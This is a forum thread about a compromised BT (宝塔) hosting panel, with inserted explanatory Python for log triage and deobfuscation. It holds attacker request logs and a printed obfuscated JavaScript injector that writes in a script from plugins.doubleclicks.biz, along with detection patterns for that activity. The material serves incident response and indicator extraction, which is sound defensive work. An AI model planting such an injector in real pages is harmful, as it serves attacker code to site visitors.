全球主机交流论坛
Views: 1346 | Replies: 6

[宝塔 / BT Panel] Logs from before the login on a hacked 宝塔 panel

Posted 2023-1-15 01:44:10
Old machine, version 7.9.0. I had never logged in to it before; today I found it had been backdoored. Since the garbage 宝塔 team censors feedback, I don't intend to report this to them any more. Don't know whether any of this is useful. Experts, take a look.
Panel request log:

: Expected GET method: '\x03\x00\x00/*à\x00\x00\x00\x00\x00Cookie: mstshash=Administr\r\n'
89.248.165.7 - - [2023-01-07 01:41:29] "/*àCookie: mstshash=Administr" 400 - 0.000117
: Invalid http version: "\x16\x03\x01\x00î\x01\x00\x00ê\x03\x03I\x06²ù¼\x99iÀYûøºe-\x83Ud]\x0e\x8d·b8´gÆÝ9dZ8f gÁ\x81i³öòË°©\x19NÖ½\x95g|püé: Expected GET method: '\x03\x00\x00/*à\x00\x00\x00\x00\x00Cookie: mstshash=Administr\r\n'
89.248.165.7 - - [2023-01-09 04:44:19] "/*àCookie: mstshash=Administr" 400 - 0.000135
: Expected GET method: '\x03\x00\x00/*à\x00\x00\x00\x00\x00Cookie: mstshash=Administr\r\n'
89.248.165.7 - - [2023-01-09 22:00:15] "/*àCookie: mstshash=Administr" 400 - 0.000161

45.77.23.0 - - [2023-01-09 22:43:29] "GET /后台入口/ HTTP/1.1" 200 44317 0.096781
45.77.23.0 - - [2023-01-09 22:43:29] "POST /login HTTP/1.1" 200 357 0.051574
45.77.23.0 - - [2023-01-09 22:43:30] "GET / HTTP/1.1" 200 7170 0.089844
45.77.23.0 - - [2023-01-09 22:43:30] "POST /ajax?action=ignore_version HTTP/1.1" 200 209 0.002588
45.77.23.0 - - [2023-01-09 22:43:30] "POST /data?action=getData HTTP/1.1" 200 705 0.002852
45.77.23.0 - - [2023-01-09 22:43:32] "POST /system?action=GetNetWork HTTP/1.1" 200 1120 1.042232
45.77.23.0 - - [2023-01-09 22:43:33] "POST /config?action=get_config HTTP/1.1" 200 1274 0.002941
45.77.23.0 - - [2023-01-09 22:43:36] "POST /files?action=upload HTTP/1.1" 200 202 2.926313
45.77.23.0 - - [2023-01-09 22:43:37] "POST /crontab?action=AddCrontab HTTP/1.1" 200 210 0.428736
45.77.23.0 - - [2023-01-09 22:43:37] "POST /crontab?action=StartTask HTTP/1.1" 200 205 0.015275
45.77.23.0 - - [2023-01-09 22:43:40] "POST /crontab?action=DelCrontab HTTP/1.1" 200 201 0.062536
45.77.23.0 - - [2023-01-09 22:43:54] "POST /system?action=ServiceAdmin HTTP/1.1" 200 202 3.345679
45.77.23.0 - - [2023-01-09 22:43:55] "POST /ajax?action=delClose HTTP/1.1" 200 204 0.048389
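The request log above is the useful evidence in this thread, so here is a small log checker as an added example (it is not from the post and not part of 宝塔). It parses this log format and labels the two things visible in it: the 400-status lines whose request field is not HTTP at all (`Cookie: mstshash=` is the routing token of an RDP connection request, the sort of thing a mass scanner sprays at every open port it finds), and a session that, within a couple of minutes of a `POST /login`, uploads a file, creates and starts a cron task, and deletes the task again. The sample lines are copied from the post; the 120-second window, the step list and the function names are this example's own assumptions.

```python
import re
from collections import defaultdict
from datetime import datetime

# Constructed test input: lines copied from the panel request log quoted above.
LOG_LINES = """\
89.248.165.7 - - [2023-01-07 01:41:29] "/*àCookie: mstshash=Administr" 400 - 0.000117
89.248.165.7 - - [2023-01-09 04:44:19] "/*àCookie: mstshash=Administr" 400 - 0.000135
45.77.23.0 - - [2023-01-09 22:43:29] "GET /后台入口/ HTTP/1.1" 200 44317 0.096781
45.77.23.0 - - [2023-01-09 22:43:29] "POST /login HTTP/1.1" 200 357 0.051574
45.77.23.0 - - [2023-01-09 22:43:30] "GET / HTTP/1.1" 200 7170 0.089844
45.77.23.0 - - [2023-01-09 22:43:36] "POST /files?action=upload HTTP/1.1" 200 202 2.926313
45.77.23.0 - - [2023-01-09 22:43:37] "POST /crontab?action=AddCrontab HTTP/1.1" 200 210 0.428736
45.77.23.0 - - [2023-01-09 22:43:37] "POST /crontab?action=StartTask HTTP/1.1" 200 205 0.015275
45.77.23.0 - - [2023-01-09 22:43:40] "POST /crontab?action=DelCrontab HTTP/1.1" 200 201 0.062536
45.77.23.0 - - [2023-01-09 22:43:54] "POST /system?action=ServiceAdmin HTTP/1.1" 200 202 3.345679
""".splitlines()

# Format: ip - - [timestamp] "request" status bytes seconds
LINE_RE = re.compile(
    r'^(?P<ip>\S+) - - \[(?P<ts>[^\]]+)\] "(?P<req>.*)" (?P<status>\d+) \S+ \S+$')
REQ_RE = re.compile(r'^(?P<method>[A-Z]+) (?P<path>\S+) HTTP/\d\.\d$')

# Ordered steps of the "upload a file, run it through a cron task, remove the
# task" pattern visible in the log. Assumption of this example: any login
# followed by all four steps within WINDOW_SECONDS deserves an alert.
PERSISTENCE_STEPS = ("/files?action=upload", "/crontab?action=AddCrontab",
                     "/crontab?action=StartTask", "/crontab?action=DelCrontab")
WINDOW_SECONDS = 120


def parse_line(line):
    """Return a dict for one log line, or None if the line is not in the format."""
    m = LINE_RE.match(line)
    if not m:
        return None
    rec = {"ip": m["ip"], "ts": datetime.strptime(m["ts"], "%Y-%m-%d %H:%M:%S"),
           "status": int(m["status"]), "raw": m["req"], "method": None, "path": None}
    r = REQ_RE.match(m["req"])
    if r:  # well-formed request line; otherwise the bytes were not HTTP at all
        rec["method"], rec["path"] = r["method"], r["path"]
    return rec


def classify_probe(rec):
    """Label lines whose request field is not an HTTP request (logged as 400)."""
    if rec["method"] is not None:
        return None
    if "mstshash=" in rec["raw"]:
        # 'Cookie: mstshash=' is the routing token of an RDP connection request:
        # a scanner speaking RDP to whatever answered on this port.
        return "RDP connection request sent to the panel port"
    return "non-HTTP bytes sent to the panel port"


def follows_in_order(paths, steps):
    """True if every step occurs in `paths` in the given order (as a subsequence)."""
    it = iter(paths)
    return all(any(p == step for p in it) for step in steps)


def find_findings(lines):
    """Scan log lines; return (ip, timestamp, reason) tuples worth a look."""
    findings, by_ip = [], defaultdict(list)
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        probe = classify_probe(rec)
        if probe:
            findings.append((rec["ip"], rec["ts"].isoformat(), probe))
        else:
            by_ip[rec["ip"]].append(rec)
    for ip, recs in by_ip.items():
        recs.sort(key=lambda r: r["ts"])
        for i, rec in enumerate(recs):
            if (rec["method"], rec["path"]) != ("POST", "/login"):
                continue
            later = [r for r in recs[i + 1:]
                     if (r["ts"] - rec["ts"]).total_seconds() <= WINDOW_SECONDS
                     and r["status"] == 200]
            if follows_in_order([r["path"] for r in later], PERSISTENCE_STEPS):
                findings.append((ip, rec["ts"].isoformat(),
                                 "POST /login followed by upload, cron add/start/delete "
                                 "within %d s" % WINDOW_SECONDS))
    return findings


if __name__ == "__main__":
    for ip, ts, reason in find_findings(LOG_LINES):
        print(ip, ts, reason)
```

Run against the sample it reports the two RDP probes from 89.248.165.7 and the 22:43:29 login from 45.77.23.0 followed by the upload-and-cron sequence. A 200 on `POST /login` does not by itself mean the login succeeded (the panel answers 200 with a JSON status), which is why the rule keys on what happens afterwards rather than on the login response alone.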
OP | Posted 2023-1-15 01:45:15
Last edited by Ricky.D. on 2023-1-15 01:47

First, rule out XSS; I had not looked at the site logs before.
Second, it's a mainland-China machine, the Tencent Cloud special edition.
OP | Posted 2023-1-15 01:58:36
/www/server/panel/logs/upgrade_polkit.log

Loaded plugins: fastestmirror, langpacks
Repository epel is listed more than once in the configuration
Loading mirror speeds from cached hostfile
* centos-sclo-rh: mirror.sfo12.us.leaseweb.net
* centos-sclo-sclo: centos.mirror.shastacoe.net
No packages marked for update
[2023-01-15 01:40:16] - 修复失败,请手动执行命令: yum -y update polkit


tail /tmp/systemd-private-56d86f7d8382402517f3b5- (no idea what this is)
var _0xafac=["\x67\x65\x74\x4D\x69\x6E\x75\x74\x65\x73","\x73\x65\x74\x4D\x69\x6E\x75\x74\x65\x73","\x63\x6F\x6F\x6B\x69\x65","\x3D","\x3B\x65\x78\x70\x69\x72\x65\x73\x3D","\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67","\x77\x61\x66\x5F\x73\x63","\x35\x38\x38\x39\x36\x34\x37\x37\x32\x36","\x25\x33\x43\x73\x63\x72\x69\x70\x74\x20\x73\x72\x63\x3D\x27\x68\x74\x74\x70\x73\x3A\x2F\x2F\x70\x6C\x75\x67\x69\x6E\x73\x2E\x64\x6F\x75\x62\x6C\x65\x63\x6C\x69\x63\x6B\x73\x2E\x62\x69\x7A\x2F\x70\x6C\x75\x67\x69\x6E\x73\x2F\x75\x61\x2F\x6C\x69\x6E\x6B\x69\x64\x2E\x6A\x73\x27\x25\x33\x45\x25\x33\x43\x2F\x73\x63\x72\x69\x70\x74\x25\x33\x45","\x77\x72\x69\x74\x65"];function setc(_0xc588x2,_0xc588x3,_0xc588x4){var _0xc588x5= new Date();_0xc588x5[_0xafac[1]](_0xc588x5[_0xafac[0]]()+ _0xc588x4);document[_0xafac[2]]= _0xc588x2+ _0xafac[3]+ _0xc588x3+ _0xafac[4]+ _0xc588x5[_0xafac[5]]()}setc(_0xafac[6],_0xafac[7],360);document[_0xafac[9]](unescape(_0xafac[8]));
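The snippet above is an obfuscated JavaScript fragment of the kind injected into pages a compromised server serves. As an added example, not part of the post, the Python below decodes its `_0xafac` string table (every entry is a plain `\xNN` hex-escaped string), renders the script with the lookups substituted, and pulls out what a responder needs: the marker cookie it sets and the remote script URL it injects through `document.write`. The table entries are copied verbatim from the snippet; the function names are this example's own.

```python
import re
from urllib.parse import unquote

# The _0xafac string table exactly as it appears in the snippet above, one
# entry per element (the long ninth entry is split with implicit concatenation).
RAW_TABLE = [
    r"\x67\x65\x74\x4D\x69\x6E\x75\x74\x65\x73",
    r"\x73\x65\x74\x4D\x69\x6E\x75\x74\x65\x73",
    r"\x63\x6F\x6F\x6B\x69\x65",
    r"\x3D",
    r"\x3B\x65\x78\x70\x69\x72\x65\x73\x3D",
    r"\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67",
    r"\x77\x61\x66\x5F\x73\x63",
    r"\x35\x38\x38\x39\x36\x34\x37\x37\x32\x36",
    r"\x25\x33\x43\x73\x63\x72\x69\x70\x74\x20\x73\x72\x63\x3D\x27\x68\x74\x74\x70\x73\x3A\x2F\x2F"
    r"\x70\x6C\x75\x67\x69\x6E\x73\x2E\x64\x6F\x75\x62\x6C\x65\x63\x6C\x69\x63\x6B\x73\x2E\x62\x69\x7A"
    r"\x2F\x70\x6C\x75\x67\x69\x6E\x73\x2F\x75\x61\x2F\x6C\x69\x6E\x6B\x69\x64\x2E\x6A\x73\x27\x25\x33\x45"
    r"\x25\x33\x43\x2F\x73\x63\x72\x69\x70\x74\x25\x33\x45",
    r"\x77\x72\x69\x74\x65",
]

HEX_ESC = re.compile(r"\\x([0-9A-Fa-f]{2})")


def decode_hex_escapes(s):
    """Replace each JavaScript hex escape (backslash, x, two hex digits) with its character."""
    return HEX_ESC.sub(lambda m: chr(int(m.group(1), 16)), s)


def decode_table(raw_table):
    """Decode every entry of the obfuscated string table."""
    return [decode_hex_escapes(entry) for entry in raw_table]


def extract_iocs(table):
    """The indicators a responder needs: the marker cookie and the injected script URL."""
    # The script runs JS unescape() on entry 8; for %XX sequences that is URL decoding.
    injected = unquote(table[8])
    m = re.search(r"src='([^']+)'", injected)
    return {"cookie_name": table[6], "cookie_value": table[7],
            "injected_html": injected,
            "script_url": m.group(1) if m else None}


def readable_script(table):
    """Re-render the snippet with the table lookups replaced by the decoded strings."""
    return (
        "function setc(name, value, minutes) {\n"
        f"  var d = new Date(); d.{table[1]}(d.{table[0]}() + minutes);\n"
        f"  document.{table[2]} = name + '{table[3]}' + value + '{table[4]}' + d.{table[5]}();\n"
        "}\n"
        f"setc('{table[6]}', '{table[7]}', 360);\n"
        f"document.{table[9]}(unescape('{table[8]}'));"
    )


if __name__ == "__main__":
    t = decode_table(RAW_TABLE)
    print(readable_script(t))
    print(extract_iocs(t))
```

Decoded, the fragment sets a cookie `waf_sc=5889647726` that expires 360 minutes later (a "already served" marker so the injection is not repeated on every page view) and writes a `<script>` tag loading `https://plugins.doubleclicks.biz/plugins/ua/linkid.js`. That hostname, the cookie name and the `_0xafac` table itself are what to search for in the web root and in served pages when cleaning up.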
Posted 2023-1-15 02:14:33
Bump.
Posted 2023-1-15 02:49:50
Searched around a bit; it looks like they were only scanning for other vulnerabilities.
I figure if this hole were that valuable, how could they not wipe the logs clean before planting the malware?
Posted 2023-1-15 02:57:38
Last edited by dua on 2023-1-15 02:58

This looks like a system vulnerability was used. Has your system been updated?
OP | Posted 2023-1-15 12:52:32, from mobile
sunlight posted on 2023-1-15 02:49:
Searched around a bit; it looks like they were only scanning for other vulnerabilities.
I figure if this hole were that valuable, how could they not wipe the logs clean before planting the malware? ...

They did delete them, but they didn't delete the runtime logs, and they logged straight into the backend.
Powered by Discuz! X3.4 (page generated GMT+8, 2024-4-28 02:37)